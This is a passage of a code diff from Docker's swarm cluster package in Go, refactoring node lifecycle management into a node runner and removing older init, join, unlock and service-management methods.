ErrSwarmCertificatesExpired is returned if docker was not started for the whole validity period and they had no chance to renew automatically. -var ErrSwarmCertificatesExpired = errors.New("Swarm certificates have expired. To replace them, leave the swarm and join again.") - // NetworkSubnetsProvider exposes functions for retrieving the subnets // of networks managed by Docker, so they can be filtered. type NetworkSubnetsProvider interface { - V4Subnets() []net.IPNet - V6Subnets() []net.IPNet + Subnets() ([]net.IPNet, []net.IPNet) } // Config provides values for Cluster. @@ -86,6 +83,9 @@ type Config struct { Root string Name string Backend executorpkg.Backend + ImageBackend executorpkg.ImageBackend + PluginBackend plugin.Backend + VolumeBackend executorpkg.VolumeBackend NetworkSubnetsProvider NetworkSubnetsProvider // DefaultAdvertiseAddr is the default host/IP or network interface to use @@ -94,24 +94,30 @@ type Config struct { // path to store runtime state, such as the swarm control socket RuntimeRoot string + + // WatchStream is a channel to pass watch API notifications to daemon + WatchStream chan *swarmapi.WatchMessage + + // RaftHeartbeatTick is the number of ticks for heartbeat of quorum members + RaftHeartbeatTick uint32 + + // RaftElectionTick is the number of ticks to elapse before followers propose a new round of leader election + // This value should be 10x that of RaftHeartbeatTick + RaftElectionTick uint32 } // Cluster provides capabilities to participate in a cluster as a worker or a // manager. type Cluster struct { - sync.RWMutex - *node - root string - runtimeRoot string - config Config - configEvent chan struct{} // todo: make this array and goroutine safe - actualLocalAddr string // after resolution, not persisted - stop bool - err error - cancelDelay func() - attachers map[string]*attacher - locked bool - lastNodeConfig *nodeStartConfig + mu sync.RWMutex + controlMutex sync.RWMutex // protect init/join/leave user operations + nr *nodeRunner + root string + runtimeRoot string + config Config + configEvent chan lncluster.ConfigEventType // todo: make this array and goroutine safe + attachers map[string]*attacher + watchStream chan *swarmapi.WatchMessage } // attacher manages the in-memory attachment state of a container @@ -121,43 +127,12 @@ type Cluster struct { type attacher struct { taskID string config *network.NetworkingConfig + inProgress bool attachWaitCh chan *network.NetworkingConfig attachCompleteCh chan struct{} detachWaitCh chan struct{} } -type node struct { - *swarmnode.Node - done chan struct{} - ready bool - conn *grpc.ClientConn - client swarmapi.ControlClient - logs swarmapi.LogsClient - reconnectDelay time.Duration - config nodeStartConfig -} - -// nodeStartConfig holds configuration needed to start a new node. Exported -// fields of this structure are saved to disk in json. Unexported fields -// contain data that shouldn't be persisted between daemon reloads. -type nodeStartConfig struct { - // LocalAddr is this machine's local IP or hostname, if specified. - LocalAddr string - // RemoteAddr is the address that was given to "swarm join". It is used - // to find LocalAddr if necessary. - RemoteAddr string - // ListenAddr is the address we bind to, including a port. - ListenAddr string - // AdvertiseAddr is the address other nodes should connect to, - // including a port. - AdvertiseAddr string - joinAddr string - forceNewCluster bool - joinToken string - lockKey []byte - autolock bool -} - // New creates a new Cluster instance using provided config. func New(config Config) (*Cluster, error) { root := filepath.Join(config.Root, swarmDirName) @@ -167,114 +142,61 @@ func New(config Config) (*Cluster, error) { if config.RuntimeRoot == "" { config.RuntimeRoot = root } + if config.RaftHeartbeatTick == 0 { + config.RaftHeartbeatTick = 1 + } + if config.RaftElectionTick == 0 { + // 10X heartbeat tick is the recommended ratio according to etcd docs. + config.RaftElectionTick = 10 * config.RaftHeartbeatTick + } + if err := os.MkdirAll(config.RuntimeRoot, 0700); err != nil { return nil, err } c := &Cluster{ root: root, config: config, - configEvent: make(chan struct{}, 10), + configEvent: make(chan lncluster.ConfigEventType, 10), runtimeRoot: config.RuntimeRoot, attachers: make(map[string]*attacher), + watchStream: config.WatchStream, } - - nodeConfig, err := c.loadState() - if err != nil { - if os.IsNotExist(err) { - return c, nil - } - return nil, err - } - - n, err := c.startNewNode(*nodeConfig) - if err != nil { - return nil, err - } - - select { - case <-time.After(swarmConnectTimeout): - logrus.Error("swarm component could not be started before timeout was reached") - case <-n.Ready(): - case <-n.done: - if errors.Cause(c.err) == ErrSwarmLocked { - return c, nil - } - if err, ok := errors.Cause(c.err).(x509.CertificateInvalidError); ok && err.Reason == x509.Expired { - c.err = ErrSwarmCertificatesExpired - return c, nil - } - return nil, fmt.Errorf("swarm component could not be started: %v", c.err) - } - go c.reconnectOnFailure(n) return c, nil } -func (c *Cluster) loadState() (*nodeStartConfig, error) { - dt, err := ioutil.ReadFile(filepath.Join(c.root, stateFile)) +// Start the Cluster instance +// TODO The split between New and Start can be join again when the SendClusterEvent +// method is no longer required +func (c *Cluster) Start() error { + root := filepath.Join(c.config.Root, swarmDirName) + + nodeConfig, err := loadPersistentState(root) if err != nil { - return nil, err - } - // missing certificate means no actual state to restore from - if _, err := os.Stat(filepath.Join(c.root, "certificates/swarm-node.crt")); err != nil { if os.IsNotExist(err) { - c.clearState() + return nil } - return nil, err - } - var st nodeStartConfig - if err := json.Unmarshal(dt, &st); err != nil { - return nil, err + return err } - return &st, nil -} -func (c *Cluster) saveState(config nodeStartConfig) error { - dt, err := json.Marshal(config) + nr, err := c.newNodeRunner(*nodeConfig) if err != nil { return err } - return ioutils.AtomicWriteFile(filepath.Join(c.root, stateFile), dt, 0600) -} + c.nr = nr -func (c *Cluster) reconnectOnFailure(n *node) { - for { - <-n.done - c.Lock() - if c.stop || c.node != nil { - c.Unlock() - return - } - n.reconnectDelay *= 2 - if n.reconnectDelay > maxReconnectDelay { - n.reconnectDelay = maxReconnectDelay - } - logrus.Warnf("Restarting swarm in %.2f seconds", n.reconnectDelay.Seconds()) - delayCtx, cancel := context.WithTimeout(context.Background(), n.reconnectDelay) - c.cancelDelay = cancel - c.Unlock() - <-delayCtx.Done() - if delayCtx.Err() != context.DeadlineExceeded { - return - } - c.Lock() - if c.node != nil { - c.Unlock() - return - } - var err error - config := n.config - config.RemoteAddr = c.getRemoteAddress() - config.joinAddr = config.RemoteAddr - n, err = c.startNewNode(config) + select { + case <-time.After(swarmConnectTimeout): + logrus.Error("swarm component could not be started before timeout was reached") + case err := <-nr.Ready(): if err != nil { - c.err = err - close(n.done) + logrus.WithError(err).Error("swarm component could not be started") + return nil } - c.Unlock() } + return nil } -func (c *Cluster) startNewNode(conf nodeStartConfig) (*node, error) { +func (c *Cluster) newNodeRunner(conf nodeStartConfig) (*nodeRunner, error) { if err := c.config.Backend.IsSwarmCompatible(); err != nil { return nil, err } @@ -308,1551 +230,174 @@ func (c *Cluster) startNewNode(conf nodeStartConfig) (*node, error) { } } - var control string - if runtime.GOOS == "windows" { - control = `\\.\pipe\` + controlSocket - } else { - control = filepath.Join(c.runtimeRoot, controlSocket) - } - - c.node = nil - c.cancelDelay = nil - c.stop = false - n, err := swarmnode.New(&swarmnode.Config{ - Hostname: c.config.Name, - ForceNewCluster: conf.forceNewCluster, - ListenControlAPI: control, - ListenRemoteAPI: conf.ListenAddr, - AdvertiseRemoteAPI: conf.AdvertiseAddr, - JoinAddr: conf.joinAddr, - StateDir: c.root, - JoinToken: conf.joinToken, - Executor: container.NewExecutor(c.config.Backend), - HeartbeatTick: 1, - ElectionTick: 3, - UnlockKey: conf.lockKey, - AutoLockManagers: conf.autolock, - PluginGetter: c.config.Backend.PluginGetter(), - }) + nr := &nodeRunner{cluster: c} + nr.actualLocalAddr = actualLocalAddr - if err != nil { - return nil, err - } - ctx := context.Background() - if err := n.Start(ctx); err != nil { + if err := nr.Start(conf); err != nil { return nil, err } - node := &node{ - Node: n, - done: make(chan struct{}), - reconnectDelay: initialReconnectDelay, - config: conf, - } - c.node = node - c.actualLocalAddr = actualLocalAddr // not saved - c.saveState(conf) c.config.Backend.DaemonJoinsCluster(c) - go func() { - err := detectLockedError(n.Err(ctx)) - if err != nil { - logrus.Errorf("cluster exited with error: %v", err) - } - c.Lock() - c.node = nil - c.err = err - if errors.Cause(err) == ErrSwarmLocked { - c.locked = true - confClone := conf - c.lastNodeConfig = &confClone - } - c.Unlock() - close(node.done) - }() - - go func() { - select { - case <-n.Ready(): - c.Lock() - node.ready = true - c.err = nil - c.Unlock() - case <-ctx.Done(): - } - c.configEvent <- struct{}{} - }() - - go func() { - for conn := range n.ListenControlSocket(ctx) { - c.Lock() - if node.conn != conn { - if conn == nil { - node.client = nil - node.logs = nil - } else { - node.client = swarmapi.NewControlClient(conn) - node.logs = swarmapi.NewLogsClient(conn) - } - } - node.conn = conn - c.Unlock() - c.configEvent <- struct{}{} - } - }() - - return node, nil -} - -// Init initializes new cluster from user provided request. -func (c *Cluster) Init(req types.InitRequest) (string, error) { - c.Lock() - if c.swarmExists() { - if !req.ForceNewCluster { - c.Unlock() - return "", ErrSwarmExists - } - if err := c.stopNode(); err != nil { - c.Unlock() - return "", err - } - } - - if err := validateAndSanitizeInitRequest(&req); err != nil { - c.Unlock() - return "", err - } - - listenHost, listenPort, err := resolveListenAddr(req.ListenAddr) - if err != nil { - c.Unlock() - return "", err - } - - advertiseHost, advertisePort, err := c.resolveAdvertiseAddr(req.AdvertiseAddr, listenPort) - if err != nil { - c.Unlock() - return "", err - } - - localAddr := listenHost - - // If the local address is undetermined, the advertise address - // will be used as local address, if it belongs to this system. - // If the advertise address is not local, then we try to find - // a system address to use as local address. If this fails, - // we give up and ask user to pass the listen address. - if net.ParseIP(localAddr).IsUnspecified() { - advertiseIP := net.ParseIP(advertiseHost) - - found := false - for _, systemIP := range listSystemIPs() { - if systemIP.Equal(advertiseIP) { - localAddr = advertiseIP.String() - found = true - break - } - } - - if !found { - ip, err := c.resolveSystemAddr() - if err != nil { - c.Unlock() - logrus.Warnf("Could not find a local address: %v", err) - return "", errMustSpecifyListenAddr - } - localAddr = ip.String() - } - } - - // todo: check current state existing - n, err := c.startNewNode(nodeStartConfig{ - forceNewCluster: req.ForceNewCluster, - autolock: req.AutoLockManagers, - LocalAddr: localAddr, - ListenAddr: net.JoinHostPort(listenHost, listenPort), - AdvertiseAddr: net.JoinHostPort(advertiseHost, advertisePort), - }) - if err != nil { - c.Unlock() - return "", err - } - c.Unlock() - - select { - case <-n.Ready(): - if err := initClusterSpec(n, req.Spec); err != nil { - return "", err - } - go c.reconnectOnFailure(n) - return n.NodeID(), nil - case <-n.done: - c.RLock() - defer c.RUnlock() - if !req.ForceNewCluster { // if failure on first attempt don't keep state - if err := c.clearState(); err != nil { - return "", err - } - } - return "", c.err - } -} - -// Join makes current Cluster part of an existing swarm cluster. -func (c *Cluster) Join(req types.JoinRequest) error { - c.Lock() - if c.swarmExists() { - c.Unlock() - return ErrSwarmExists - } - if err := validateAndSanitizeJoinRequest(&req); err != nil { - c.Unlock() - return err - } - - listenHost, listenPort, err := resolveListenAddr(req.ListenAddr) - if err != nil { - c.Unlock() - return err - } - - var advertiseAddr string - if req.AdvertiseAddr != "" { - advertiseHost, advertisePort, err := c.resolveAdvertiseAddr(req.AdvertiseAddr, listenPort) - // For joining, we don't need to provide an advertise address, - // since the remote side can detect it. - if err == nil { - advertiseAddr = net.JoinHostPort(advertiseHost, advertisePort) - } - } - - // todo: check current state existing - n, err := c.startNewNode(nodeStartConfig{ - RemoteAddr: req.RemoteAddrs[0], - ListenAddr: net.JoinHostPort(listenHost, listenPort), - AdvertiseAddr: advertiseAddr, - joinAddr: req.RemoteAddrs[0], - joinToken: req.JoinToken, - }) - if err != nil { - c.Unlock() - return err - } - c.Unlock() - - select { - case <-time.After(swarmConnectTimeout): - // attempt to connect will continue in background, but reconnect only if it didn't fail - go func() { - select { - case <-n.Ready(): - c.reconnectOnFailure(n) - case <-n.done: - logrus.Errorf("failed to join the cluster: %+v", c.err) - } - }() - return ErrSwarmJoinTimeoutReached - case <-n.Ready(): - go c.reconnectOnFailure(n) - return nil - case <-n.done: - c.RLock() - defer c.RUnlock() - return c.err - } -} - -// GetUnlockKey returns the unlock key for the swarm. -func (c *Cluster) GetUnlockKey() (string, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return "", c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - client := swarmapi.NewCAClient(c.conn) - - r, err := client.GetUnlockKey(ctx, &swarmapi.GetUnlockKeyRequest{}) - if err != nil { - return "", err - } - - if len(r.UnlockKey) == 0 { - // no key - return "", nil - } - - return encryption.HumanReadableKey(r.UnlockKey), nil -} - -// UnlockSwarm provides a key to decrypt data that is encrypted at rest. -func (c *Cluster) UnlockSwarm(req types.UnlockRequest) error { - c.RLock() - if !c.isActiveManager() { - if err := c.errNoManager(); err != ErrSwarmLocked { - c.RUnlock() - return err - } - } - - if c.node != nil || c.locked != true { - c.RUnlock() - return errors.New("swarm is not locked") - } - c.RUnlock() - - key, err := encryption.ParseHumanReadableKey(req.UnlockKey) - if err != nil { - return err - } - - c.Lock() - config := *c.lastNodeConfig - config.lockKey = key - n, err := c.startNewNode(config) - if err != nil { - c.Unlock() - return err - } - c.Unlock() - select { - case <-n.Ready(): - case <-n.done: - if errors.Cause(c.err) == ErrSwarmLocked { - return errors.New("swarm could not be unlocked: invalid key provided") - } - return fmt.Errorf("swarm component could not be started: %v", c.err) - } - go c.reconnectOnFailure(n) - return nil -} - -// stopNode is a helper that stops the active c.node and waits until it has -// shut down. Call while keeping the cluster lock. -func (c *Cluster) stopNode() error { - if c.node == nil { - return nil - } - c.stop = true - if c.cancelDelay != nil { - c.cancelDelay() - c.cancelDelay = nil - } - node := c.node - ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second) - defer cancel() - // TODO: can't hold lock on stop because it calls back to network - c.Unlock() - defer c.Lock() - if err := node.Stop(ctx); err != nil && !strings.Contains(err.Error(), "context canceled") { - return err - } - <-node.done - return nil -} - -func removingManagerCausesLossOfQuorum(reachable, unreachable int) bool { - return reachable-2 <= unreachable -} - -func isLastManager(reachable, unreachable int) bool { - return reachable == 1 && unreachable == 0 -} - -// Leave shuts down Cluster and removes current state. -func (c *Cluster) Leave(force bool) error { - c.Lock() - node := c.node - if node == nil { - if c.locked { - c.locked = false - c.lastNodeConfig = nil - c.Unlock() - } else if c.err == ErrSwarmCertificatesExpired { - c.err = nil - c.Unlock() - } else { - c.Unlock() - return ErrNoSwarm - } - } else { - if node.Manager() != nil && !force { - msg := "You are attempting to leave the swarm on a node that is participating as a manager. " - if c.isActiveManager() { - active, reachable, unreachable, err := c.managerStats() - if err == nil { - if active && removingManagerCausesLossOfQuorum(reachable, unreachable) { - if isLastManager(reachable, unreachable) { - msg += "Removing the last manager erases all current state of the swarm. Use `--force` to ignore this message. " - c.Unlock() - return fmt.Errorf(msg) - } - msg += fmt.Sprintf("Removing this node leaves %v managers out of %v. Without a Raft quorum your swarm will be inaccessible. ", reachable-1, reachable+unreachable) - } - } - } else { - msg += "Doing so may lose the consensus of your cluster. " - } - - msg += "The only way to restore a swarm that has lost consensus is to reinitialize it with `--force-new-cluster`. Use `--force` to suppress this message." - c.Unlock() - return fmt.Errorf(msg) - } - if err := c.stopNode(); err != nil { - logrus.Errorf("failed to shut down cluster node: %v", err) - signal.DumpStacks("") - c.Unlock() - return err - } - c.Unlock() - if nodeID := node.NodeID(); nodeID != "" { - nodeContainers, err := c.listContainerForNode(nodeID) - if err != nil { - return err - } - for _, id := range nodeContainers { - if err := c.config.Backend.ContainerRm(id, &apitypes.ContainerRmConfig{ForceRemove: true}); err != nil { - logrus.Errorf("error removing %v: %v", id, err) - } - } - } - } - c.configEvent <- struct{}{} - // todo: cleanup optional? - if err := c.clearState(); err != nil { - return err - } - - return nil -} - -func (c *Cluster) listContainerForNode(nodeID string) ([]string, error) { - var ids []string - filters := filters.NewArgs() - filters.Add("label", fmt.Sprintf("com.docker.swarm.node.id=%s", nodeID)) - containers, err := c.config.Backend.Containers(&apitypes.ContainerListOptions{ - Filters: filters, - }) - if err != nil { - return []string{}, err - } - for _, c := range containers { - ids = append(ids, c.ID) - } - return ids, nil -} -func (c *Cluster) clearState() error { - // todo: backup this data instead of removing? - if err := os.RemoveAll(c.root); err != nil { - return err - } - if err := os.MkdirAll(c.root, 0700); err != nil { - return err - } - c.config.Backend.DaemonLeavesCluster() - return nil + return nr, nil } func (c *Cluster) getRequestContext() (context.Context, func()) { // TODO: not needed when requests don't block on qourum lost return context.WithTimeout(context.Background(), swarmRequestTimeout) } -// Inspect retrieves the configuration properties of a managed swarm cluster. -func (c *Cluster) Inspect() (types.Swarm, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return types.Swarm{}, c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - swarm, err := getSwarm(ctx, c.client) - if err != nil { - return types.Swarm{}, err - } - - return convert.SwarmFromGRPC(*swarm), nil -} - -// Update updates configuration of a managed swarm cluster. -func (c *Cluster) Update(version uint64, spec types.Spec, flags types.UpdateFlags) error { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - swarm, err := getSwarm(ctx, c.client) - if err != nil { - return err - } - - // In update, client should provide the complete spec of the swarm, including - // Name and Labels. If a field is specified with 0 or nil, then the default value - // will be used to swarmkit. - clusterSpec, err := convert.SwarmSpecToGRPC(spec) - if err != nil { - return err - } - - _, err = c.client.UpdateCluster( - ctx, - &swarmapi.UpdateClusterRequest{ - ClusterID: swarm.ID, - Spec: &clusterSpec, - ClusterVersion: &swarmapi.Version{ - Index: version, - }, - Rotation: swarmapi.KeyRotation{ - WorkerJoinToken: flags.RotateWorkerToken, - ManagerJoinToken: flags.RotateManagerToken, - ManagerUnlockKey: flags.RotateManagerUnlockKey, - }, - }, - ) - return err -} - // IsManager returns true if Cluster is participating as a manager. func (c *Cluster) IsManager() bool { - c.RLock() - defer c.RUnlock() - return c.isActiveManager() + c.mu.RLock() + defer c.mu.RUnlock() + return c.currentNodeState().IsActiveManager() } // IsAgent returns true if Cluster is participating as a worker/agent. func (c *Cluster) IsAgent() bool { - c.RLock() - defer c.RUnlock() - return c.node != nil && c.ready + c.mu.RLock() + defer c.mu.RUnlock() + return c.currentNodeState().status == types.LocalNodeStateActive } // GetLocalAddress returns the local address. func (c *Cluster) GetLocalAddress() string { - c.RLock() - defer c.RUnlock() - return c.actualLocalAddr + c.mu.RLock() + defer c.mu.RUnlock() + return c.currentNodeState().actualLocalAddr } // GetListenAddress returns the listen address. func (c *Cluster) GetListenAddress() string { - c.RLock() - defer c.RUnlock() - if c.node != nil { - return c.node.config.ListenAddr + c.mu.RLock() + defer c.mu.RUnlock() + if c.nr != nil { + return c.nr.config.ListenAddr } return "" } // GetAdvertiseAddress returns the remotely reachable address of this node. func (c *Cluster) GetAdvertiseAddress() string { - c.RLock() - defer c.RUnlock() - if c.node != nil && c.node.config.AdvertiseAddr != "" { - advertiseHost, _, _ := net.SplitHostPort(c.node.config.AdvertiseAddr) + c.mu.RLock() + defer c.mu.RUnlock() + if c.nr != nil && c.nr.config.AdvertiseAddr != "" { + advertiseHost, _, _ := net.SplitHostPort(c.nr.config.AdvertiseAddr) return advertiseHost } - return c.actualLocalAddr + return c.currentNodeState().actualLocalAddr +} + +// GetDataPathAddress returns the address to be used for the data path traffic, if specified. +func (c *Cluster) GetDataPathAddress() string { + c.mu.RLock() + defer c.mu.RUnlock() + if c.nr != nil { + return c.nr.config.DataPathAddr + } + return "" } -// GetRemoteAddress returns a known advertise address of a remote manager if +// GetRemoteAddressList returns the advertise address for each of the remote managers if // available. -// todo: change to array/connect with info -func (c *Cluster) GetRemoteAddress() string { - c.RLock() - defer c.RUnlock() - return c.getRemoteAddress() +func (c *Cluster) GetRemoteAddressList() []string { + c.mu.RLock() + defer c.mu.RUnlock() + return c.getRemoteAddressList() +} + +// GetWatchStream returns the channel to pass changes from store watch API +func (c *Cluster) GetWatchStream() chan *swarmapi.WatchMessage { + c.mu.RLock() + defer c.mu.RUnlock() + return c.watchStream } -func (c *Cluster) getRemoteAddress() string { - if c.node == nil { - return "" +func (c *Cluster) getRemoteAddressList() []string { + state := c.currentNodeState() + if state.swarmNode == nil { + return []string{} } - nodeID := c.node.NodeID() - for _, r := range c.node.Remotes() { + + nodeID := state.swarmNode.NodeID() + remotes := state.swarmNode.Remotes() + addressList := make([]string, 0, len(remotes)) + for _, r := range remotes { if r.NodeID != nodeID { - return r.Addr + addressList = append(addressList, r.Addr) } } - return "" + return addressList } // ListenClusterEvents returns a channel that receives messages on cluster // participation changes. // todo: make cancelable and accessible to multiple callers -func (c *Cluster) ListenClusterEvents() <-chan struct{} { +func (c *Cluster) ListenClusterEvents() <-chan lncluster.ConfigEventType { return c.configEvent } -// Info returns information about the current cluster state. -func (c *Cluster) Info() types.Info { - info := types.Info{ - NodeAddr: c.GetAdvertiseAddress(), - } - - c.RLock() - defer c.RUnlock() +// currentNodeState should not be called without a read lock +func (c *Cluster) currentNodeState() nodeState { + return c.nr.State() +} - if c.node == nil { - info.LocalNodeState = types.LocalNodeStateInactive - if c.cancelDelay != nil { - info.LocalNodeState = types.LocalNodeStateError - } - if c.locked { - info.LocalNodeState = types.LocalNodeStateLocked - } else if c.err == ErrSwarmCertificatesExpired { - info.LocalNodeState = types.LocalNodeStateError +// errNoManager returns error describing why manager commands can't be used. +// Call with read lock. +func (c *Cluster) errNoManager(st nodeState) error { + if st.swarmNode == nil { + if errors.Cause(st.err) == errSwarmLocked { + return errSwarmLocked } - } else { - info.LocalNodeState = types.LocalNodeStatePending - if c.ready == true { - info.LocalNodeState = types.LocalNodeStateActive - } else if c.locked { - info.LocalNodeState = types.LocalNodeStateLocked + if st.err == errSwarmCertificatesExpired { + return errSwarmCertificatesExpired } + return errors.WithStack(notAvailableError("This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again.")) } - if c.err != nil { - info.Error = c.err.Error() + if st.swarmNode.Manager() != nil { + return errors.WithStack(notAvailableError("This node is not a swarm manager. Manager is being prepared or has trouble connecting to the cluster.")) } + return errors.WithStack(notAvailableError("This node is not a swarm manager. Worker nodes can't be used to view or modify cluster state. Please run this command on a manager node or promote the current node to a manager.")) +} - ctx, cancel := c.getRequestContext() - defer cancel() - - if c.isActiveManager() { - info.ControlAvailable = true - swarm, err := c.Inspect() - if err != nil { - info.Error = err.Error() - } +// Cleanup stops active swarm node. This is run before daemon shutdown. +func (c *Cluster) Cleanup() { + c.controlMutex.Lock() + defer c.controlMutex.Unlock() - // Strip JoinTokens - info.Cluster = swarm.ClusterInfo + c.mu.Lock() + node := c.nr + if node == nil { + c.mu.Unlock() + return + } + state := c.currentNodeState() + c.mu.Unlock() - if r, err := c.client.ListNodes(ctx, &swarmapi.ListNodesRequest{}); err == nil { - info.Nodes = len(r.Nodes) - for _, n := range r.Nodes { - if n.ManagerStatus != nil { - info.Managers = info.Managers + 1 - } + if state.IsActiveManager() { + active, reachable, unreachable, err := managerStats(state.controlClient, state.NodeID()) + if err == nil { + singlenode := active && isLastManager(reachable, unreachable) + if active && !singlenode && removingManagerCausesLossOfQuorum(reachable, unreachable) { + logrus.Errorf("Leaving cluster with %v managers left out of %v. Raft quorum will be lost.", reachable-1, reachable+unreachable) } } } - if c.node != nil { - for _, r := range c.node.Remotes() { - info.RemoteManagers = append(info.RemoteManagers, types.Peer{NodeID: r.NodeID, Addr: r.Addr}) - } - info.NodeID = c.node.NodeID() + if err := node.Stop(); err != nil { + logrus.Errorf("failed to shut down cluster node: %v", err) + signal.DumpStacks("") } - return info + c.mu.Lock() + c.nr = nil + c.mu.Unlock() } -// isActiveManager should not be called without a read lock -func (c *Cluster) isActiveManager() bool { - return c.node != nil && c.conn != nil -} - -// swarmExists should not be called without a read lock -func (c *Cluster) swarmExists() bool { - return c.node != nil || c.locked || c.err == ErrSwarmCertificatesExpired -} - -// errNoManager returns error describing why manager commands can't be used. -// Call with read lock. -func (c *Cluster) errNoManager() error { - if c.node == nil { - if c.locked { - return ErrSwarmLocked - } - if c.err == ErrSwarmCertificatesExpired { - return ErrSwarmCertificatesExpired - } - return fmt.Errorf("This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again.") - } - if c.node.Manager() != nil { - return fmt.Errorf("This node is not a swarm manager. Manager is being prepared or has trouble connecting to the cluster.") - } - return fmt.Errorf("This node is not a swarm manager. Worker nodes can't be used to view or modify cluster state. Please run this command on a manager node or promote the current node to a manager.") -} - -// GetServices returns all services of a managed swarm cluster. -func (c *Cluster) GetServices(options apitypes.ServiceListOptions) ([]types.Service, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return nil, c.errNoManager() - } - - filters, err := newListServicesFilters(options.Filters) - if err != nil { - return nil, err - } - ctx, cancel := c.getRequestContext() - defer cancel() - - r, err := c.client.ListServices( - ctx, - &swarmapi.ListServicesRequest{Filters: filters}) - if err != nil { - return nil, err - } - - services := []types.Service{} - - for _, service := range r.Services { - services = append(services, convert.ServiceFromGRPC(*service)) - } - - return services, nil -} - -// imageWithDigestString takes an image such as name or name:tag -// and returns the image pinned to a digest, such as name@sha256:34234... -// Due to the difference between the docker/docker/reference, and the -// docker/distribution/reference packages, we're parsing the image twice. -// As the two packages converge, this function should be simplified. -// TODO(nishanttotla): After the packages converge, the function must -// convert distreference.Named -> distreference.Canonical, and the logic simplified. -func (c *Cluster) imageWithDigestString(ctx context.Context, image string, authConfig *apitypes.AuthConfig) (string, error) { - if _, err := digest.ParseDigest(image); err == nil { - return "", errors.New("image reference is an image ID") - } - ref, err := distreference.ParseNamed(image) - if err != nil { - return "", err - } - // only query registry if not a canonical reference (i.e. with digest) - if _, ok := ref.(distreference.Canonical); !ok { - // create a docker/docker/reference Named object because GetRepository needs it - dockerRef, err := reference.ParseNamed(image) - if err != nil { - return "", err - } - dockerRef = reference.WithDefaultTag(dockerRef) - namedTaggedRef, ok := dockerRef.(reference.NamedTagged) - if !ok { - return "", fmt.Errorf("unable to cast image to NamedTagged reference object") - } - - repo, _, err := c.config.Backend.GetRepository(ctx, namedTaggedRef, authConfig) - if err != nil { - return "", err - } - dscrptr, err := repo.Tags(ctx).Get(ctx, namedTaggedRef.Tag()) - if err != nil { - return "", err - } - - namedDigestedRef, err := distreference.WithDigest(distreference.EnsureTagged(ref), dscrptr.Digest) - if err != nil { - return "", err - } - return namedDigestedRef.String(), nil - } - // reference already contains a digest, so just return it - return ref.String(), nil -} - -// CreateService creates a new service in a managed swarm cluster. -func (c *Cluster) CreateService(s types.ServiceSpec, encodedAuth string) (*apitypes.ServiceCreateResponse, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return nil, c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - err := c.populateNetworkID(ctx, c.client, &s) - if err != nil { - return nil, err - } - - serviceSpec, err := convert.ServiceSpecToGRPC(s) - if err != nil { - return nil, err - } - - ctnr := serviceSpec.Task.GetContainer() - if ctnr == nil { - return nil, fmt.Errorf("service does not use container tasks") - } - - if encodedAuth != "" { - ctnr.PullOptions = &swarmapi.ContainerSpec_PullOptions{RegistryAuth: encodedAuth} - } - - // retrieve auth config from encoded auth - authConfig := &apitypes.AuthConfig{} - if encodedAuth != "" { - if err := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, strings.NewReader(encodedAuth))).Decode(authConfig); err != nil { - logrus.Warnf("invalid authconfig: %v", err) - } - } - - resp := &apitypes.ServiceCreateResponse{} - - // pin image by digest - if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" { - digestImage, err := c.imageWithDigestString(ctx, ctnr.Image, authConfig) - if err != nil { - logrus.Warnf("unable to pin image %s to digest: %s", ctnr.Image, err.Error()) - resp.Warnings = append(resp.Warnings, fmt.Sprintf("unable to pin image %s to digest: %s", ctnr.Image, err.Error())) - } else if ctnr.Image != digestImage { - logrus.Debugf("pinning image %s by digest: %s", ctnr.Image, digestImage) - ctnr.Image = digestImage - } else { - logrus.Debugf("creating service using supplied digest reference %s", ctnr.Image) - } - } - - r, err := c.client.CreateService(ctx, &swarmapi.CreateServiceRequest{Spec: &serviceSpec}) - if err != nil { - return nil, err - } - - resp.ID = r.Service.ID - return resp, nil -} - -// GetService returns a service based on an ID or name. -func (c *Cluster) GetService(input string) (types.Service, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return types.Service{}, c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - service, err := getService(ctx, c.client, input) - if err != nil { - return types.Service{}, err - } - return convert.ServiceFromGRPC(*service), nil -} - -// UpdateService updates existing service to match new properties. -func (c *Cluster) UpdateService(serviceIDOrName string, version uint64, spec types.ServiceSpec, encodedAuth string, registryAuthFrom string) (*apitypes.ServiceUpdateResponse, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return nil, c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - err := c.populateNetworkID(ctx, c.client, &spec) - if err != nil { - return nil, err - } - - serviceSpec, err := convert.ServiceSpecToGRPC(spec) - if err != nil { - return nil, err - } - - currentService, err := getService(ctx, c.client, serviceIDOrName) - if err != nil { - return nil, err - } - - newCtnr := serviceSpec.Task.GetContainer() - if newCtnr == nil { - return nil, fmt.Errorf("service does not use container tasks") - } - - if encodedAuth != "" { - newCtnr.PullOptions = &swarmapi.ContainerSpec_PullOptions{RegistryAuth: encodedAuth} - } else { - // this is needed because if the encodedAuth isn't being updated then we - // shouldn't lose it, and continue to use the one that was already present - var ctnr *swarmapi.ContainerSpec - switch registryAuthFrom { - case apitypes.RegistryAuthFromSpec, "": - ctnr = currentService.Spec.Task.GetContainer() - case apitypes.RegistryAuthFromPreviousSpec: - if currentService.PreviousSpec == nil { - return nil, fmt.Errorf("service does not have a previous spec") - } - ctnr = currentService.PreviousSpec.Task.GetContainer() - default: - return nil, fmt.Errorf("unsupported registryAuthFromValue") - } - if ctnr == nil { - return nil, fmt.Errorf("service does not use container tasks") - } - newCtnr.PullOptions = ctnr.PullOptions - // update encodedAuth so it can be used to pin image by digest - if ctnr.PullOptions != nil { - encodedAuth = ctnr.PullOptions.RegistryAuth - 